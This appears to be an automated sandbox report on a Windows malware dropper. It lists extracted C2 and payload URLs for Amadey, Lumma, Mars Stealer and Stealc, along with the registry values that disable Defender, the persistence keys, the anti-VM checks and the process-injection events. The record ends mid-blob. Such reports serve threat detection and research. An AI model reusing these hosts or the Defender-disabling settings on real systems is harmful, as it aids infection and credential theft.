Analysis
-
max time kernel
147s -
max time network
147s -
platform
windows7_x64 -
resource
win7-20250207-en -
resource tags
arch:x64arch:x86image:win7-20250207-enlocale:en-usos:windows7-x64system -
submitted
16/03/2025, 18:13
Static task
static1
Behavioral task
behavioral1
Sample
d9f00ea479721f7581810bda98dca097.exe
Resource
win7-20250207-en
Behavioral task
behavioral2
Sample
d9f00ea479721f7581810bda98dca097.exe
Resource
win10v2004-20250314-en
General
-
Target
d9f00ea479721f7581810bda98dca097.exe
-
Size
2.1MB
-
MD5
d9f00ea479721f7581810bda98dca097
-
SHA1
0b438eab56eb426d68bdeb2bd7c6f69af19daca6
-
SHA256
53e550919e4087a4a81da0a462925b7772fa2ddd870e6036a2069347631214e1
-
SHA512
af216b63003175ac1a4a135a242b2b26a31fd49dc9988f822a04a920fb47c27961eeb481bc8bc1c4c25fc9e09f407c7e0ae079210481c515442525707773af55
-
SSDEEP
49152:JEESzuUhMGOiuMWTSby13yX9FIgn3ITa02qmF:JQBbHWTr1493Y+IU
Malware Config
Extracted
http://176.113.115.7/mine/random.exe
Extracted
http://176.113.115.7/mine/random.exe
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Extracted
lumma
https://gunrightsp.run/api
https://caliberc.today/api
https://pistolpra.bet/api
https://weaponwo.life/api
https://armamenti.world/api
https://selfdefens.bet/api
https://targett.top/api
https://armoryarch.shop/api
https://blackeblast.run/api
https://codxefusion.top/api
https://hardswarehub.today/api
https://pgadgethgfub.icu/api
https://hardrwarehaven.run/api
https://techmindzs.live/api
https://bz2ncodxefusion.top/api
https://quietswtreams.life/api
https://techspherxe.top/api
https://earthsymphzony.today/api
https://begindecafer.world/api
https://9garagedrootz.top/api
https://modelshiverd.icu/api
https://arisechairedd.shop/api
https://catterjur.run/api
https://orangemyther.live/api
https://fostinjec.today/api
https://ksterpickced.digital/api
https://zfurrycomp.top/api
https://tcrosshairc.life/api
https://mrodularmall.top/api
https://jowinjoinery.icu/api
https://legenassedk.top/api
https://hhtardwarehu.icu/api
https://cjlaspcorne.icu/api
https://bugildbett.top/api
https://weaponrywo.digital/api
Extracted
marsstealer
Default
ctrlgem.xyz/gate.php
Extracted
stealc
trump
http://45.93.20.28
-
url_path
/85a1cacf11314eb8.php
Extracted
lumma
https://codxefusion.top/api
Signatures
-
Amadey family
-
Detects Healer an antivirus disabler dropper 3 IoCs
resource yara_rule behavioral1/memory/3416-863-0x00000000009F0000-0x0000000000E56000-memory.dmp healer behavioral1/memory/3416-864-0x00000000009F0000-0x0000000000E56000-memory.dmp healer behavioral1/memory/3416-928-0x00000000009F0000-0x0000000000E56000-memory.dmp healer -
Healer family
-
Lumma family
-
Mars Stealer
An infostealer written in C++ based on other infostealers.
-
Marsstealer family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" 00e7be516b.exe -
Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection 00e7be516b.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" 00e7be516b.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" 00e7be516b.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" 00e7be516b.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" 00e7be516b.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" 00e7be516b.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 00e7be516b.exe -
Modifies Windows Defender notification settings 3 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications 00e7be516b.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" 00e7be516b.exe -
Stealc family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 14 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 2be00504eb.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 00e7be516b.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 7db14a892a.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 7a4262cb0d.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ UD49QH6.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 970d7d5d87.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 1be2e64926.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ f96225d44f.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ UD49QH6.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 42624cf095.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ d9f00ea479721f7581810bda98dca097.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempCRLQ2NAU2BD8ZLD3CXGHLFXLOGTOOHPW.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 483d2fa8a0d53818306efeb32d3.exe -
Blocklisted process makes network request 2 IoCs
flow pid Process 28 1540 powershell.exe 34 300 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Run Powershell and hide display window.
pid Process 300 powershell.exe 1540 powershell.exe 2604 powershell.exe 980 powershell.exe 2836 powershell.exe -
Downloads MZ/PE file 25 IoCs
flow pid Process 152 1164 BitLockerToGo.exe 159 2832 rapes.exe 159 2832 rapes.exe 165 3712 BitLockerToGo.exe 33 768 futors.exe 34 300 powershell.exe 45 768 futors.exe 109 768 futors.exe 23 768 futors.exe 23 768 futors.exe 23 768 futors.exe 23 768 futors.exe 149 3768 BitLockerToGo.exe 202 2832 rapes.exe 5 2832 rapes.exe 28 1540 powershell.exe 195 3936 Gxtuum.exe 8 2832 rapes.exe 8 2832 rapes.exe 8 2832 rapes.exe 8 2832 rapes.exe 8 2832 rapes.exe 8 2832 rapes.exe 8 2832 rapes.exe 8 2832 rapes.exe -
Checks BIOS information in registry 2 TTPs 28 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion d9f00ea479721f7581810bda98dca097.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 970d7d5d87.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 2be00504eb.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 7a4262cb0d.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 42624cf095.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempCRLQ2NAU2BD8ZLD3CXGHLFXLOGTOOHPW.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempCRLQ2NAU2BD8ZLD3CXGHLFXLOGTOOHPW.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 970d7d5d87.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 00e7be516b.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 00e7be516b.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 7db14a892a.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion UD49QH6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 2be00504eb.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 7db14a892a.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 7a4262cb0d.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 1be2e64926.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion f96225d44f.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion f96225d44f.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion UD49QH6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion d9f00ea479721f7581810bda98dca097.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion UD49QH6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 1be2e64926.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion UD49QH6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 42624cf095.exe -
Executes dropped EXE 42 IoCs
pid Process 2832 rapes.exe 1784 amnew.exe 768 futors.exe 2992 UD49QH6.exe 1424 m0wsoI3.exe 2188 trano1221.exe 2688 trano1221.exe 3004 36fe0958ef.exe 1704 cronikxqqq.exe 1188 Process not Found 796 cronikxqqq.exe 1580 cronikxqqq.exe 992 cronikxqqq.exe 2520 cronikxqqq.exe 2576 TempCRLQ2NAU2BD8ZLD3CXGHLFXLOGTOOHPW.EXE 2932 970d7d5d87.exe 1036 dw.exe 2088 483d2fa8a0d53818306efeb32d3.exe 1680 v7942.exe 2752 crypted.exe 1368 2be00504eb.exe 1696 crypted.exe 2796 crypted.exe 2372 bbc9d61153.exe 2508 mrwipre12.exe 3416 00e7be516b.exe 3628 7db14a892a.exe 3848 7a4262cb0d.exe 4024 1be2e64926.exe 2364 f96225d44f.exe 3992 m0wsoI3.exe 3480 UD49QH6.exe 3648 HmngBpR.exe 3600 SplashWin.exe 3612 SplashWin.exe 1668 zY9sqWs.exe 3936 Gxtuum.exe 3476 f1f2f41f71.exe 3848 f1f2f41f71.exe 4032 Bkzpa.exe 6976 1b9e525a1a.exe 7164 42624cf095.exe -
Identifies Wine through registry keys 2 TTPs 14 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Wine d9f00ea479721f7581810bda98dca097.exe Key opened \REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Wine TempCRLQ2NAU2BD8ZLD3CXGHLFXLOGTOOHPW.EXE Key opened \REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Wine 970d7d5d87.exe Key opened \REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Wine 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Wine 00e7be516b.exe Key opened \REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Wine 7db14a892a.exe Key opened \REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Wine f96225d44f.exe Key opened \REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Wine UD49QH6.exe Key opened \REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Wine UD49QH6.exe Key opened \REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Wine 2be00504eb.exe Key opened \REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Wine 7a4262cb0d.exe Key opened \REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Wine 1be2e64926.exe Key opened \REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Wine 42624cf095.exe -
Loads dropped DLL 64 IoCs
pid Process 1544 d9f00ea479721f7581810bda98dca097.exe 2832 rapes.exe 1784 amnew.exe 2832 rapes.exe 2832 rapes.exe 2832 rapes.exe 2832 rapes.exe 768 futors.exe 2188 trano1221.exe 2688 trano1221.exe 2688 trano1221.exe 2688 trano1221.exe 2688 trano1221.exe 2688 trano1221.exe 2688 trano1221.exe 2688 trano1221.exe 2832 rapes.exe 768 futors.exe 1704 cronikxqqq.exe 1704 cronikxqqq.exe 1704 cronikxqqq.exe 1704 cronikxqqq.exe 1976 WerFault.exe 1976 WerFault.exe 1976 WerFault.exe 1976 WerFault.exe 1976 WerFault.exe 1540 powershell.exe 2832 rapes.exe 768 futors.exe 300 powershell.exe 1424 m0wsoI3.exe 1424 m0wsoI3.exe 768 futors.exe 768 futors.exe 2172 WerFault.exe 2172 WerFault.exe 2172 WerFault.exe 2172 WerFault.exe 2484 WerFault.exe 2484 WerFault.exe 2484 WerFault.exe 768 futors.exe 1536 WerFault.exe 1536 WerFault.exe 1536 WerFault.exe 1536 WerFault.exe 2832 rapes.exe 2832 rapes.exe 768 futors.exe 768 futors.exe 1696 crypted.exe 2832 rapes.exe 768 futors.exe 1164 WerFault.exe 1164 WerFault.exe 1164 WerFault.exe 1164 WerFault.exe 2832 rapes.exe 2832 rapes.exe 768 futors.exe 768 futors.exe 768 futors.exe 768 futors.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Windows security modification 2 TTPs 2 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 00e7be516b.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features 00e7be516b.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 7 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Microsoft\Windows\CurrentVersion\Run\bbc9d61153.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10235960101\\bbc9d61153.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Microsoft\Windows\CurrentVersion\Run\00e7be516b.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10235970101\\00e7be516b.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Microsoft\Windows\CurrentVersion\Run\7db14a892a.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10030290101\\7db14a892a.exe" futors.exe Set value (str) \REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Microsoft\Windows\CurrentVersion\Run\7a4262cb0d.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10030300101\\7a4262cb0d.exe" futors.exe Set value (str) \REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Microsoft\Windows\CurrentVersion\Run\36fe0958ef.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10235690101\\36fe0958ef.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10235700121\\am_no.cmd" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Microsoft\Windows\CurrentVersion\Run\2be00504eb.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10235950101\\2be00504eb.exe" rapes.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
AutoIT Executable 2 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x000500000001c8c9-300.dat autoit_exe behavioral1/files/0x0005000000005b42-683.dat autoit_exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 14 IoCs
pid Process 1544 d9f00ea479721f7581810bda98dca097.exe 2832 rapes.exe 2992 UD49QH6.exe 2576 TempCRLQ2NAU2BD8ZLD3CXGHLFXLOGTOOHPW.EXE 2932 970d7d5d87.exe 2088 483d2fa8a0d53818306efeb32d3.exe 1368 2be00504eb.exe 3416 00e7be516b.exe 3628 7db14a892a.exe 3848 7a4262cb0d.exe 4024 1be2e64926.exe 2364 f96225d44f.exe 3480 UD49QH6.exe 7164 42624cf095.exe -
Suspicious use of SetThreadContext 7 IoCs
description pid Process procid_target PID 1704 set thread context of 2520 1704 cronikxqqq.exe 55 PID 1696 set thread context of 2796 1696 crypted.exe 86 PID 3628 set thread context of 3768 3628 7db14a892a.exe 115 PID 3848 set thread context of 1164 3848 7a4262cb0d.exe 117 PID 2364 set thread context of 3712 2364 f96225d44f.exe 120 PID 3612 set thread context of 2364 3612 SplashWin.exe 129 PID 3476 set thread context of 3848 3476 f1f2f41f71.exe 135 -
resource yara_rule behavioral1/files/0x000500000001c85b-293.dat upx behavioral1/memory/2688-295-0x000007FEF5E40000-0x000007FEF6429000-memory.dmp upx behavioral1/memory/2688-399-0x000007FEF5E40000-0x000007FEF6429000-memory.dmp upx -
Drops file in Windows directory 3 IoCs
description ioc Process File created C:\Windows\Tasks\rapes.job d9f00ea479721f7581810bda98dca097.exe File created C:\Windows\Tasks\futors.job amnew.exe File created C:\Windows\Tasks\Gxtuum.job zY9sqWs.exe -
Detects Pyinstaller 1 IoCs
resource yara_rule behavioral1/files/0x0005000000019239-163.dat pyinstaller -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 4 IoCs
pid pid_target Process procid_target 1976 1704 WerFault.exe 48 2484 2932 WerFault.exe 68 3692 7164 WerFault.exe 143 1504 7072 WerFault.exe 142 -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 00e7be516b.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7a4262cb0d.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language f1f2f41f71.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language d9f00ea479721f7581810bda98dca097.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ipconfig.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language f96225d44f.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cronikxqqq.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SCHTASKS.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bbc9d61153.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage bbc9d61153.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language futors.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 970d7d5d87.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1be2e64926.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2be00504eb.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language UD49QH6.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dw.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language crypted.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rapes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 36fe0958ef.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language UD49QH6.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cronikxqqq.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language crypted.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language bbc9d61153.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7db14a892a.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language zY9sqWs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SplashWin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SplashWin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language f1f2f41f71.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Bkzpa.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language m0wsoI3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Gxtuum.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 42624cf095.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language m0wsoI3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language amnew.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe -
Checks processor information in registry 2 TTPs 10 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 m0wsoI3.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString m0wsoI3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString m0wsoI3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\CurrentPatchLevel firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 m0wsoI3.exe -
Delays execution with timeout.exe 3 IoCs
pid Process 1932 timeout.exe 2104 timeout.exe 3224 timeout.exe -
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
pid Process 6804 ipconfig.exe -
Kills process with taskkill 5 IoCs
pid Process 1424 taskkill.exe 1544 taskkill.exe 1972 taskkill.exe 2692 taskkill.exe 2104 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000_Classes\Local Settings firefox.exe -
Modifies system certificate store 2 TTPs 9 IoCs
description ioc Process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f9